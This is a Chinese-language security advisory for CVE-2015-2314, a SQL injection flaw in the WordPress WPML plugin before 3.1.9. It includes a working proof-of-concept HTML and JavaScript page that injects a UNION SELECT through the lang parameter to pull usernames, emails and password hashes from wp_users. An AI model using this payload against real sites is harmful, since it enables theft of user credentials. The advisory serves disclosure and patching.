发布日期:2015-03-05
更新日期:2015-03-18
受影响系统:
WordPress WPML < 3.1.9
描述:
CVE(CAN) ID: CVE-2015-2314
WPML是创建多语言WordPress站点使用的行业标准。
WPML 3.1.9之前版本在实现上存在sql注入漏洞,通过在comments/feed的wp-link-ajax操作中,发送构造的HTTP Referer标头里的lang参数,远程攻击者利用此漏洞可执行任意sql命令。
<*来源:Jouko Pynnonen (jouko@iki.fi)
链接:
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jouko Pynnonen (jouko@iki.fi)提供了如下测试方法:
<script>
var union="select
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
wp_users";
if (document.location.search.length < 2)
document.location.search="lang=xx' UNION "+union+" -- -- ";
</script>
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
<input type=hidden name=action value="wp-link-ajax">
<input type=submit>
</form>
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: